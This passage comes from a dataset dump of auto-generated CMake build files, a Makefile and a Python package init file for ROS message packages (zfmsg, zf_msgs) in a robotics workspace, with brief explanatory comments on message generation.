${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/path)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/path\n DESTINATION ${gencpp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_cpp)\n add_dependencies(path_generate_messages_cpp std_msgs_generate_messages_cpp)\nendif()\n\nif(geneus_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/path)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/path\n DESTINATION ${geneus_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_eus)\n add_dependencies(path_generate_messages_eus std_msgs_generate_messages_eus)\nendif()\n\nif(genlisp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/path)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/path\n DESTINATION ${genlisp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_lisp)\n add_dependencies(path_generate_messages_lisp std_msgs_generate_messages_lisp)\nendif()\n\nif(gennodejs_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/path)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/path\n DESTINATION ${gennodejs_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_nodejs)\n add_dependencies(path_generate_messages_nodejs std_msgs_generate_messages_nodejs)\nendif()\n\nif(genpy_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/path)\n install(CODE \"execute_process(COMMAND \\\"/usr/bin/python\\\" -m compileall \\\"${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/path\\\")\")\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/path\n DESTINATION ${genpy_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_py)\n add_dependencies(path_generate_messages_py std_msgs_generate_messages_py)\nendif()\n"
},
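A note on the warning embedded in the generated path-genmsg.cmake above: genmsg emits it because the path package invokes generate_messages() without having declared any .msg or .srv files. A minimal sketch of the fix in the package's own CMakeLists.txt, assuming the package is actually meant to export a message (Waypoint.msg is a placeholder name, not a file from this repo):

    # Hypothetical fix in src/path/CMakeLists.txt -- declare files before generating:
    find_package(catkin REQUIRED COMPONENTS roscpp std_msgs message_generation)
    add_message_files(FILES Waypoint.msg)      # placeholder message name, not in the repo
    generate_messages(DEPENDENCIES std_msgs)
    catkin_package(CATKIN_DEPENDS message_runtime std_msgs)

If the package defines no messages, simply deleting the generate_messages() call silences the warning.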
{
"alpha_fraction": 0.7356746792793274,
"alphanum_fraction": 0.776340126991272,
"avg_line_length": 48.181819915771484,
"blob_id": "561c5aa473a4b9e0c2d7b3f7d87f7590c10dd7b3",
"content_id": "cd744eb6a9427206518aede14c3ab263c2d8bf6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 541,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 11,
"path": "/build/zf_msgs/CMakeFiles/zf_msgs_generate_messages_py.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/zf_msgs_generate_messages_py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zf_msgs/msg/_pos320.py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zf_msgs/msg/_pose2dArray.py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zf_msgs/msg/__init__.py\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/zf_msgs_generate_messages_py.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.7433722019195557,
"alphanum_fraction": 0.7879109382629395,
"avg_line_length": 61.86666488647461,
"blob_id": "a4bd9136308c3cf698be03fd2c791e911c1ce6b0",
"content_id": "48b3225996d9020aad2bd4b250b3f421afbb9ea4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 943,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 15,
"path": "/build/zfmsg/CMakeFiles/zfmsg_generate_messages_py.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/zfmsg_generate_messages_py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zfmsg/msg/_BreakStatus.py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zfmsg/msg/_SteerStatus.py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zfmsg/msg/_ThrottleGearStatus.py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zfmsg/msg/_MotionCmd.py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zfmsg/msg/_CanInfo.py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zfmsg/msg/_CanInfoAW.py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zfmsg/msg/__init__.py\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/zfmsg_generate_messages_py.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.7564767003059387,
"alphanum_fraction": 0.7564767003059387,
"avg_line_length": 47.25,
"blob_id": "b94e0ca3ce341788838ba9ca968b8f78881604bb",
"content_id": "3c4517ec871eea64f6fa747e2e90aecc80a56706",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 193,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 4,
"path": "/build/zf_msgs/catkin_generated/installspace/zf_msgs-msg-paths.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.installspace.in\n\n_prepend_path(\"${zf_msgs_DIR}/..\" \"msg\" zf_msgs_MSG_INCLUDE_DIRS UNIQUE)\nset(zf_msgs_MSG_DEPENDENCIES std_msgs;geometry_msgs)\n"
},
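The generated files above pin down the zf_msgs interface: two messages (pos320.msg and pose2dArray.msg, per the cmake_clean lists) with std_msgs and geometry_msgs as dependencies (per zf_msgs_MSG_DEPENDENCIES). A sketch of the message-generation stanza in src/zf_msgs/CMakeLists.txt that would produce this output — reconstructed from those artifacts, not copied from the repo:

    # Assumed stanza for src/zf_msgs/CMakeLists.txt, inferred from the generated files:
    find_package(catkin REQUIRED COMPONENTS std_msgs geometry_msgs message_generation)
    add_message_files(FILES pos320.msg pose2dArray.msg)
    generate_messages(DEPENDENCIES std_msgs geometry_msgs)
    catkin_package(CATKIN_DEPENDS message_runtime std_msgs geometry_msgs)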
{
"alpha_fraction": 0.7468085289001465,
"alphanum_fraction": 0.765744686126709,
"avg_line_length": 50.63736343383789,
"blob_id": "29df3d791b0d98e812bce6b3b7bf35a1b0333efb",
"content_id": "ba9f630435653741ad12d7fc51755978b6f23fd0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 4700,
"license_type": "no_license",
"max_line_length": 192,
"num_lines": 91,
"path": "/build/zfmsg/cmake_install.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# Install script for directory: /home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg\n\n# Set the install prefix\nif(NOT DEFINED CMAKE_INSTALL_PREFIX)\n set(CMAKE_INSTALL_PREFIX \"/home/zf/xuechong_ws/zhuifengShow0919/install\")\nendif()\nstring(REGEX REPLACE \"/$\" \"\" CMAKE_INSTALL_PREFIX \"${CMAKE_INSTALL_PREFIX}\")\n\n# Set the install configuration name.\nif(NOT DEFINED CMAKE_INSTALL_CONFIG_NAME)\n if(BUILD_TYPE)\n string(REGEX REPLACE \"^[^A-Za-z0-9_]+\" \"\"\n CMAKE_INSTALL_CONFIG_NAME \"${BUILD_TYPE}\")\n else()\n set(CMAKE_INSTALL_CONFIG_NAME \"\")\n endif()\n message(STATUS \"Install configuration: \\\"${CMAKE_INSTALL_CONFIG_NAME}\\\"\")\nendif()\n\n# Set the component getting installed.\nif(NOT CMAKE_INSTALL_COMPONENT)\n if(COMPONENT)\n message(STATUS \"Install component: \\\"${COMPONENT}\\\"\")\n set(CMAKE_INSTALL_COMPONENT \"${COMPONENT}\")\n else()\n set(CMAKE_INSTALL_COMPONENT)\n endif()\nendif()\n\n# Install shared libraries without execute permission?\nif(NOT DEFINED CMAKE_INSTALL_SO_NO_EXE)\n set(CMAKE_INSTALL_SO_NO_EXE \"1\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zfmsg/msg\" TYPE FILE FILES\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\"\n )\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zfmsg/cmake\" TYPE FILE FILES \"/home/zf/xuechong_ws/zhuifengShow0919/build/zfmsg/catkin_generated/installspace/zfmsg-msg-paths.cmake\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/include\" TYPE DIRECTORY FILES \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zfmsg\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/roseus/ros\" TYPE DIRECTORY FILES \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/roseus/ros/zfmsg\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/common-lisp/ros\" TYPE DIRECTORY FILES \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zfmsg\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/gennodejs/ros\" TYPE DIRECTORY FILES \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zfmsg\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n execute_process(COMMAND \"/usr/bin/python\" -m compileall \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zfmsg\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/lib/python2.7/dist-packages\" TYPE DIRECTORY FILES 
\"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zfmsg\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/lib/pkgconfig\" TYPE FILE FILES \"/home/zf/xuechong_ws/zhuifengShow0919/build/zfmsg/catkin_generated/installspace/zfmsg.pc\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zfmsg/cmake\" TYPE FILE FILES \"/home/zf/xuechong_ws/zhuifengShow0919/build/zfmsg/catkin_generated/installspace/zfmsg-msg-extras.cmake\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zfmsg/cmake\" TYPE FILE FILES\n \"/home/zf/xuechong_ws/zhuifengShow0919/build/zfmsg/catkin_generated/installspace/zfmsgConfig.cmake\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/build/zfmsg/catkin_generated/installspace/zfmsgConfig-version.cmake\"\n )\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zfmsg\" TYPE FILE FILES \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/package.xml\")\nendif()\n\n"
},
{
"alpha_fraction": 0.6470588445663452,
"alphanum_fraction": 0.7254902124404907,
"avg_line_length": 24.5,
"blob_id": "c507288e59c635589f125f8f8fd880a791670cb9",
"content_id": "3acbf84a9f1f4db286710920d6ad3e014c61256b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 51,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 2,
"path": "/devel/lib/python2.7/dist-packages/zf_msgs/msg/__init__.py",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "from ._pos320 import *\nfrom ._pose2dArray import *\n"
},
{
"alpha_fraction": 0.7552165985107422,
"alphanum_fraction": 0.7660833597183228,
"avg_line_length": 41.15053939819336,
"blob_id": "f9e4eb2fac985f37f9f628db4390adf5e2229d40",
"content_id": "ce1d451a406b02a24319720da47851f957a0fdb6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 19601,
"license_type": "no_license",
"max_line_length": 230,
"num_lines": 465,
"path": "/build/zfmsg/Makefile",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# CMAKE generated file: DO NOT EDIT!\n# Generated by \"Unix Makefiles\" Generator, CMake Version 3.5\n\n# Default target executed when no arguments are given to make.\ndefault_target: all\n\n.PHONY : default_target\n\n# Allow only one \"make -f Makefile2\" at a time, but pass parallelism.\n.NOTPARALLEL:\n\n\n#=============================================================================\n# Special targets provided by cmake.\n\n# Disable implicit rules so canonical targets will work.\n.SUFFIXES:\n\n\n# Remove some rules from gmake that .SUFFIXES does not remove.\nSUFFIXES =\n\n.SUFFIXES: .hpux_make_needs_suffix_list\n\n\n# Suppress display of executed commands.\n$(VERBOSE).SILENT:\n\n\n# A target that is always out of date.\ncmake_force:\n\n.PHONY : cmake_force\n\n#=============================================================================\n# Set environment variables for the build.\n\n# The shell in which to execute make rules.\nSHELL = /bin/sh\n\n# The CMake executable.\nCMAKE_COMMAND = /usr/bin/cmake\n\n# The command to remove a file.\nRM = /usr/bin/cmake -E remove -f\n\n# Escaping for special characters.\nEQUALS = =\n\n# The top-level source directory on which CMake was run.\nCMAKE_SOURCE_DIR = /home/zf/xuechong_ws/zhuifengShow0919/src\n\n# The top-level build directory on which CMake was run.\nCMAKE_BINARY_DIR = /home/zf/xuechong_ws/zhuifengShow0919/build\n\n#=============================================================================\n# Targets provided globally by CMake.\n\n# Special rule for the target list_install_components\nlist_install_components:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Available install components are: \\\"Unspecified\\\"\"\n.PHONY : list_install_components\n\n# Special rule for the target list_install_components\nlist_install_components/fast: list_install_components\n\n.PHONY : list_install_components/fast\n\n# Special rule for the target rebuild_cache\nrebuild_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake to regenerate build system...\"\n\t/usr/bin/cmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : rebuild_cache\n\n# Special rule for the target rebuild_cache\nrebuild_cache/fast: rebuild_cache\n\n.PHONY : rebuild_cache/fast\n\n# Special rule for the target install/local\ninstall/local: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing only the local directory...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_LOCAL_ONLY=1 -P cmake_install.cmake\n.PHONY : install/local\n\n# Special rule for the target install/local\ninstall/local/fast: install/local\n\n.PHONY : install/local/fast\n\n# Special rule for the target install/strip\ninstall/strip: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing the project stripped...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_DO_STRIP=1 -P cmake_install.cmake\n.PHONY : install/strip\n\n# Special rule for the target install/strip\ninstall/strip/fast: install/strip\n\n.PHONY : install/strip/fast\n\n# Special rule for the target install\ninstall: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install\n\n# Special rule for the target install\ninstall/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install/fast\n\n# Special rule for the target 
edit_cache\nedit_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake cache editor...\"\n\t/usr/bin/ccmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : edit_cache\n\n# Special rule for the target edit_cache\nedit_cache/fast: edit_cache\n\n.PHONY : edit_cache/fast\n\n# Special rule for the target test\ntest:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running tests...\"\n\t/usr/bin/ctest --force-new-ctest-process $(ARGS)\n.PHONY : test\n\n# Special rule for the target test\ntest/fast: test\n\n.PHONY : test/fast\n\n# The main all target\nall: cmake_check_build_system\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -E cmake_progress_start /home/zf/xuechong_ws/zhuifengShow0919/build/CMakeFiles /home/zf/xuechong_ws/zhuifengShow0919/build/zfmsg/CMakeFiles/progress.marks\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/all\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/zf/xuechong_ws/zhuifengShow0919/build/CMakeFiles 0\n.PHONY : all\n\n# The main clean target\nclean:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/clean\n.PHONY : clean\n\n# The main clean target\nclean/fast: clean\n\n.PHONY : clean/fast\n\n# Prepare targets for installation.\npreinstall: all\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/preinstall\n.PHONY : preinstall\n\n# Prepare targets for installation.\npreinstall/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/preinstall\n.PHONY : preinstall/fast\n\n# clear depends\ndepend:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 1\n.PHONY : depend\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_gennodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_gennodejs.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_gennodejs.dir/rule\n\n# Convenience name for target.\nzfmsg_gennodejs: zfmsg/CMakeFiles/zfmsg_gennodejs.dir/rule\n\n.PHONY : zfmsg_gennodejs\n\n# fast build rule for target.\nzfmsg_gennodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_gennodejs.dir/build.make zfmsg/CMakeFiles/zfmsg_gennodejs.dir/build\n.PHONY : zfmsg_gennodejs/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_genpy.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_genpy.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_genpy.dir/rule\n\n# Convenience name for target.\nzfmsg_genpy: zfmsg/CMakeFiles/zfmsg_genpy.dir/rule\n\n.PHONY : zfmsg_genpy\n\n# fast build rule for target.\nzfmsg_genpy/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_genpy.dir/build.make zfmsg/CMakeFiles/zfmsg_genpy.dir/build\n.PHONY : zfmsg_genpy/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_generate_messages_cpp.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\nzfmsg_generate_messages_cpp: zfmsg/CMakeFiles/zfmsg_generate_messages_cpp.dir/rule\n\n.PHONY : zfmsg_generate_messages_cpp\n\n# fast build rule for 
target.\nzfmsg_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_generate_messages_cpp.dir/build.make zfmsg/CMakeFiles/zfmsg_generate_messages_cpp.dir/build\n.PHONY : zfmsg_generate_messages_cpp/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_MotionCmd.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_MotionCmd.dir/rule\n.PHONY : zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_MotionCmd.dir/rule\n\n# Convenience name for target.\n_zfmsg_generate_messages_check_deps_MotionCmd: zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_MotionCmd.dir/rule\n\n.PHONY : _zfmsg_generate_messages_check_deps_MotionCmd\n\n# fast build rule for target.\n_zfmsg_generate_messages_check_deps_MotionCmd/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_MotionCmd.dir/build.make zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_MotionCmd.dir/build\n.PHONY : _zfmsg_generate_messages_check_deps_MotionCmd/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_generate_messages.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_generate_messages.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_generate_messages.dir/rule\n\n# Convenience name for target.\nzfmsg_generate_messages: zfmsg/CMakeFiles/zfmsg_generate_messages.dir/rule\n\n.PHONY : zfmsg_generate_messages\n\n# fast build rule for target.\nzfmsg_generate_messages/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_generate_messages.dir/build.make zfmsg/CMakeFiles/zfmsg_generate_messages.dir/build\n.PHONY : zfmsg_generate_messages/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_BreakStatus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_BreakStatus.dir/rule\n.PHONY : zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_BreakStatus.dir/rule\n\n# Convenience name for target.\n_zfmsg_generate_messages_check_deps_BreakStatus: zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_BreakStatus.dir/rule\n\n.PHONY : _zfmsg_generate_messages_check_deps_BreakStatus\n\n# fast build rule for target.\n_zfmsg_generate_messages_check_deps_BreakStatus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_BreakStatus.dir/build.make zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_BreakStatus.dir/build\n.PHONY : _zfmsg_generate_messages_check_deps_BreakStatus/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_generate_messages_eus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_generate_messages_eus.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_generate_messages_eus.dir/rule\n\n# Convenience name for target.\nzfmsg_generate_messages_eus: zfmsg/CMakeFiles/zfmsg_generate_messages_eus.dir/rule\n\n.PHONY : zfmsg_generate_messages_eus\n\n# fast build rule for target.\nzfmsg_generate_messages_eus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_generate_messages_eus.dir/build.make zfmsg/CMakeFiles/zfmsg_generate_messages_eus.dir/build\n.PHONY : 
zfmsg_generate_messages_eus/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_SteerStatus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_SteerStatus.dir/rule\n.PHONY : zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_SteerStatus.dir/rule\n\n# Convenience name for target.\n_zfmsg_generate_messages_check_deps_SteerStatus: zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_SteerStatus.dir/rule\n\n.PHONY : _zfmsg_generate_messages_check_deps_SteerStatus\n\n# fast build rule for target.\n_zfmsg_generate_messages_check_deps_SteerStatus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_SteerStatus.dir/build.make zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_SteerStatus.dir/build\n.PHONY : _zfmsg_generate_messages_check_deps_SteerStatus/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_gencpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_gencpp.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_gencpp.dir/rule\n\n# Convenience name for target.\nzfmsg_gencpp: zfmsg/CMakeFiles/zfmsg_gencpp.dir/rule\n\n.PHONY : zfmsg_gencpp\n\n# fast build rule for target.\nzfmsg_gencpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_gencpp.dir/build.make zfmsg/CMakeFiles/zfmsg_gencpp.dir/build\n.PHONY : zfmsg_gencpp/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfo.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfo.dir/rule\n.PHONY : zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfo.dir/rule\n\n# Convenience name for target.\n_zfmsg_generate_messages_check_deps_CanInfo: zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfo.dir/rule\n\n.PHONY : _zfmsg_generate_messages_check_deps_CanInfo\n\n# fast build rule for 